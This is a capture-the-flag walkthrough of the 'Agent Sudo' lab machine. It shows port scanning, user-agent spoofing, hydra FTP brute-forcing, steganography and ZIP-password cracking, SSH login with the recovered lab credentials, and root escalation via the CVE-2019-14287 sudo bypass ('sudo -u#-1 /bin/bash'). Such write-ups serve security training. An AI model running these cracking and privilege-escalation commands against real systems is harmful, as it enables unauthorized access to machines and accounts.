Agent Sudo
1. Reconnaissance:
export TARGET_IP=10.10.17.101
nmap -p- --min-rate 5000 $TARGET_IP
Not shown: 65318 closed tcp ports (reset), 214 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
2. HTTP Service Analysis:
Navigating to http://$TARGET_IP/
reveals the following message:
Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent R
This suggests that the website utilizes user-agent filtering. The message implies that valid user-agents might correspond to agent codenames.
3. User-Agent Enumeration:
The initial hypothesis is that agent codenames might correspond to letters of the alphabet. curl
is used to spoof the user-agent and identify a valid codename.
curl -A "R" -L $TARGET_IP
What are you doing! Are you one of the 25 employees? If not, I going to report this incident
This message suggests "R" is not a valid user-agent.
curl -A "C" -L $TARGET_IP
Attention chris, <br><br>
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>
From,<br>
Agent R
This reveals a username, "chris," and suggests his password might be weak.
4. FTP Password Cracking:
hydra -V -l "chris" -P /usr/share/wordlists/rockyou.txt ftp://$TARGET_IP -f
Hydra successfully identifies the password:
[21][ftp] host: 10.10.17.101 login: chris password: crystal
5. FTP Access and File Retrieval:
FTP is used to connect to the target with the discovered credentials and retrieve all files.
ftp $TARGET_IP # Credentials: `chris:crystal`
ftp> mget * # Download everything
The contents of To_agentJ.txt
are examined:
cat To_agentJ.txt
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C
This message indicates a steganography challenge. Agent J's password is hidden within cutie.png
.
6. Steganography and ZIP Extraction:
binwalk
is used to analyze cutie.png
for embedded data.
binwalk -e cutie.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
WARNING: One or more files failed to extract: either no utility was found or it's unimplemented
Binwalk reveals an embedded ZIP archive. The zip2john
tool is then used to prepare the ZIP archive's hash for cracking with john
.
cd _cutie.png.extracted
zip2john 8702.zip > hash && john --wordlist=/usr/share/wordlists/rockyou.txt hash # alien
7z e 8702.zip
The password "alien" is recovered. The archive 8702.zip
is extracted using 7zip. The extracted file To_agentR.txt
is read.
cat To_agentR.txt
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
The base64 encoded string "QXJlYTUx" is decoded to "Area51".
echo "QXJlYTUx" | base64 -d # Area51
The string "Area51" is likely another password.
7. Steghide Extraction and User Password Retrieval:
steghide extract -sf cute-alien.jpg # Password: Area51
cat message.txt
The extracted message.txt
reveals the password for user "james":
Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
8. SSH Access and Privilege Escalation Assessment:
ssh james@$TARGET_IP # Password: hackerrules!
id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
The output of id
confirms successful login as "james" and reveals that he is a member of the sudo
group.
The file Alien_autospy.jpg
is downloaded for further analysis.
scp james@$TARGET_IP:~/Alien_autospy.jpg . # Password: hackerrules!
Searching for "Roswell alien autopsy" reveals the incident is the Roswell alien autopsy.
The sudo -l
command is used to determine what commands "james" can execute with elevated privileges.
sudo -l
(ALL, !root) /bin/bash
The output indicates that "james" can run /bin/bash
as any user except root. This restriction can be bypassed due to a known vulnerability in sudo
versions prior to 1.8.28 (CVE-2019-14287).
sudo --version # Sudo version 1.8.21p2
9. Privilege Escalation (CVE-2019-14287):
The vulnerability allows specifying a user ID of -1 which sudo
interprets as user ID 0 (root).
sudo -u#-1 /bin/bash
id # uid=0(root) gid=1000(james) groups=1000(james)
The id
command confirms that the shell is now running as root.